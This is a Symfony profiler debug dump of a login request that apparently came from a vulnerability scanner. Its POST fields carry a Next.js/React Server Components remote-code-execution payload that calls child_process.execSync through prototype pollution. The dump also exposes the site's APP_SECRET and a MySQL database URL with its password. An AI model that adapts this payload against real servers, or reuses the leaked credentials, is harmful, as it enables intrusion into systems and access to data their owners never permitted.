Request / Response
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| 0 | "{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}" |
| 1 | ""$@0"" |
| 2 | "[]" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _controller | "App\Controller\SecurityController::login" |
| _firewall_context | "security.firewall.map.context.main" |
| _redirected | true |
| _remove_csp_headers | true |
| _route | "security_login" |
| _route_params | [] |
| _security_firewall_run | "_security_main" |
| _stopwatch_token | "afe354" |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| accept-encoding | "gzip, deflate" |
| connection | "close" |
| content-length | "753" |
| content-type | "multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad" |
| cookie | "sf_redirect=%7B%22token%22%3A%223149aa%22%2C%22route%22%3A%22index%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CIndexController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fvhosts%5C%2Fsystembiletowy.pl%5C%2Ftes%5C%2Fv2%5C%2Fsrc%5C%2FController%5C%2FIndexController.php%22%2C%22line%22%3A19%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D" |
| host | "v2.tes.systembiletowy.pl" |
| next-action | "x" |
| user-agent | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" |
| x-accel-internal | "/internal-nginx-static-location" |
| x-nextjs-html-request-id | "SSTMXm7OJ_g0Ncx6jpQt9" |
| x-nextjs-request-id | "b5dce965" |
| x-php-ob-level | "1" |
| x-real-ip | "3.7.66.200" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "private, must-revalidate" |
| content-type | "text/html; charset=UTF-8" |
| date | "Wed, 17 Dec 2025 21:58:12 GMT" |
| expires | "-1" |
| pragma | "no-cache" |
| x-debug-exception | "The%20key%20%22_username%22%20must%20be%20a%20string%2C%20%22NULL%22%20given." |
| x-debug-exception-file | "%2Fvar%2Fwww%2Fvhosts%2Fsystembiletowy.pl%2Ftes%2Fv2%2Fvendor%2Fsymfony%2Fsecurity-http%2FAuthenticator%2FFormLoginAuthenticator.php:128" |
| x-debug-token | "e67dc5" |
| x-debug-token-link | "https://v2.tes.systembiletowy.pl/_profiler/9aa739" |
| x-previous-debug-token | "9aa739" |
| x-robots-tag | "noindex" |
Cookies
Request Cookies
| Key | Value |
|---|---|
| sf_redirect | "{"token":"3149aa","route":"index","method":"GET","controller":{"class":"App\\Controller\\IndexController","method":"index","file":"\/var\/www\/vhosts\/systembiletowy.pl\/tes\/v2\/src\/Controller\/IndexController.php","line":19},"status_code":302,"status_text":"Found"}" |
Response Cookies
No response cookies
Session 1
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
1
Usages
Stateless check enabled
| Usage |
|---|
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:41
[
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
"line" => 41
"function" => "getMetadataBag"
"class" => "Symfony\Component\HttpFoundation\Session\Session"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-http/Authenticator/RememberMeAuthenticator.php"
"line" => 69
"function" => "getToken"
"class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
"line" => 111
"function" => "supports"
"class" => "Symfony\Component\Security\Http\Authenticator\RememberMeAuthenticator"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
"line" => 34
"function" => "supports"
"class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
"line" => 40
"function" => "supports"
"class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
"line" => 38
"function" => "supports"
"class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-http/Firewall/AbstractListener.php"
"line" => 25
"function" => "supports"
"class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
"line" => 60
"function" => "__invoke"
"class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
"line" => 77
"function" => "__invoke"
"class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-http/Firewall.php"
"line" => 95
"function" => "callListeners"
"class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
"line" => 115
"function" => "onKernelRequest"
"class" => "Symfony\Component\Security\Http\Firewall"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/event-dispatcher/EventDispatcher.php"
"line" => 206
"function" => "__invoke"
"class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/event-dispatcher/EventDispatcher.php"
"line" => 56
"function" => "callListeners"
"class" => "Symfony\Component\EventDispatcher\EventDispatcher"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
"line" => 122
"function" => "dispatch"
"class" => "Symfony\Component\EventDispatcher\EventDispatcher"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/http-kernel/HttpKernel.php"
"line" => 159
"function" => "dispatch"
"class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/http-kernel/HttpKernel.php"
"line" => 76
"function" => "handleRaw"
"class" => "Symfony\Component\HttpKernel\HttpKernel"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/http-kernel/Kernel.php"
"line" => 182
"function" => "handle"
"class" => "Symfony\Component\HttpKernel\HttpKernel"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
"line" => 35
"function" => "handle"
"class" => "Symfony\Component\HttpKernel\Kernel"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/autoload_runtime.php"
"line" => 29
"function" => "run"
"class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
"type" => "->"
]
[
"file" => "/var/www/vhosts/systembiletowy.pl/tes/v2/public/index.php"
"line" => 5
"args" => [
"/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/autoload_runtime.php"
]
"function" => "require_once"
]
]
|
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "2ca64f8d83b9e89f5f19d672841d6bb8" |
| DATABASE_URL | "mysql://b1_tes:bGCZuDMVPO+jipZc@127.0.0.1:3306/b1_tes?charset=utf8mb4" |
| customerFromOrder | "1" |
| prefix | "tes" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "753" |
| CONTENT_TYPE | "multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/vhosts/systembiletowy.pl/tes/v2/public" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/vhosts/systembiletowy.pl/tes/v2/public" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www/vhosts/systembiletowy.pl" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_ACCEPT_ENCODING | "gzip, deflate" |
| HTTP_CONNECTION | "close" |
| HTTP_COOKIE | "sf_redirect=%7B%22token%22%3A%223149aa%22%2C%22route%22%3A%22index%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CIndexController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fvhosts%5C%2Fsystembiletowy.pl%5C%2Ftes%5C%2Fv2%5C%2Fsrc%5C%2FController%5C%2FIndexController.php%22%2C%22line%22%3A19%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D" |
| HTTP_HOST | "v2.tes.systembiletowy.pl" |
| HTTP_NEXT_ACTION | "x" |
| HTTP_USER_AGENT | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" |
| HTTP_X_ACCEL_INTERNAL | "/internal-nginx-static-location" |
| HTTP_X_NEXTJS_HTML_REQUEST_ID | "SSTMXm7OJ_g0Ncx6jpQt9" |
| HTTP_X_NEXTJS_REQUEST_ID | "b5dce965" |
| HTTP_X_REAL_IP | "3.7.66.200" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REDIRECT_HTTPS | "on" |
| REDIRECT_STATUS | "200" |
| REDIRECT_UNIQUE_ID | "aUMndHu5tRUwwWPbejS8wwAAAAU" |
| REDIRECT_URL | "/login" |
| REMOTE_ADDR | "3.7.66.200" |
| REMOTE_PORT | "37644" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1766008692 |
| REQUEST_TIME_FLOAT | 1766008692.3064 |
| REQUEST_URI | "/login" |
| SCRIPT_FILENAME | "/var/www/vhosts/systembiletowy.pl/tes/v2/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "51.83.239.27" |
| SERVER_ADMIN | "[no address given]" |
| SERVER_NAME | "v2.tes.systembiletowy.pl" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.0" |
| SERVER_SIGNATURE | "<address>Apache Server at v2.tes.systembiletowy.pl Port 443</address>\n" |
| SERVER_SOFTWARE | "Apache" |
| SYMFONY_DOTENV_PATH | "/var/www/vhosts/systembiletowy.pl/tes/v2/.env" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,prefix,customerFromOrder" |
| UNIQUE_ID | "aUMndHu5tRUwwWPbejS8wwAAAAU" |
| USER | "systembiletowy" |
| proxy-nokeepalive | "1" |
Sub Requests 1
ErrorController (token = 9aa739)
| Key | Value |
|---|---|
| _controller | "error_controller" |
| _stopwatch_token | "f714ab" |
| exception | Symfony\Component\HttpKernel\Exception\BadRequestHttpException {#574 #message: "The key "_username" must be a string, "NULL" given." #code: 0 #file: "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-http/Authenticator/FormLoginAuthenticator.php" #line: 128 -statusCode: 400 -headers: [] : { { Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator->getCredentials(Request $request): array … › |
| logger | Symfony\Bridge\Monolog\Processor\DebugProcessor {#229 -records: [ 54 => [ [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.339+01:00" "message" => "Matched route "{route}"." "priority" => 200 "priorityName" => "INFO" "context" => [ "route" => "security_login" "route_parameters" => [ "_route" => "security_login" "_controller" => "App\Controller\SecurityController::login" ] "request_uri" => "https://v2.tes.systembiletowy.pl/login" "method" => "POST" ] "channel" => "request" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.342+01:00" "message" => "Checking for authenticator support." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "firewall_name" => "main" "authenticators" => 2 ] "channel" => "security" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.343+01:00" "message" => "Checking support on authenticator." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "firewall_name" => "main" "authenticator" => "Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator" ] "channel" => "security" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.343+01:00" "message" => "Checking support on authenticator." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "firewall_name" => "main" "authenticator" => "Symfony\Component\Security\Http\Authenticator\RememberMeAuthenticator" ] "channel" => "security" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.343+01:00" "message" => "Authenticator does not support the request." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "firewall_name" => "main" "authenticator" => "Symfony\Component\Security\Http\Authenticator\RememberMeAuthenticator" ] "channel" => "security" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Component\HttpKernel\EventListener\DebugHandlersListener::configure" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Component\HttpKernel\EventListener\ValidateRequestListener::onKernelRequest" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Bridge\Doctrine\Middleware\IdleConnection\Listener::onKernelRequest" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Component\HttpKernel\EventListener\SessionListener::onKernelRequest" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleListener::setDefaultLocale" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Component\HttpKernel\EventListener\FragmentListener::onKernelRequest" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Component\AssetMapper\AssetMapperDevServerSubscriber::onKernelRequest" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Component\HttpKernel\EventListener\RouterListener::onKernelRequest" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleListener::onKernelRequest" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleAwareListener::onKernelRequest" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener::configureLogoutUrlGenerator" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.344+01:00" "message" => "Notified event "{event}" to listener "{listener}"." "priority" => 100 "priorityName" => "DEBUG" "context" => [ "event" => "kernel.request" "listener" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener::onKernelRequest" ] "channel" => "event" ] [ "timestamp" => 1766008692 "timestamp_rfc3339" => "2025-12-17T22:58:12.346+01:00" "message" => "Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\BadRequestHttpException: "The key "_username" must be a string, "NULL" given." at FormLoginAuthenticator.php line 128" "priority" => 400 "priorityName" => "ERROR" "context" => [ "exception" => Symfony\Component\HttpKernel\Exception\BadRequestHttpException {#574 #message: "The key "_username" must be a string, "NULL" given." #code: 0 #file: "/var/www/vhosts/systembiletowy.pl/tes/v2/vendor/symfony/security-http/Authenticator/FormLoginAuthenticator.php" #line: 128 -statusCode: 400 -headers: [] : { { Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator->getCredentials(Request $request): array … › |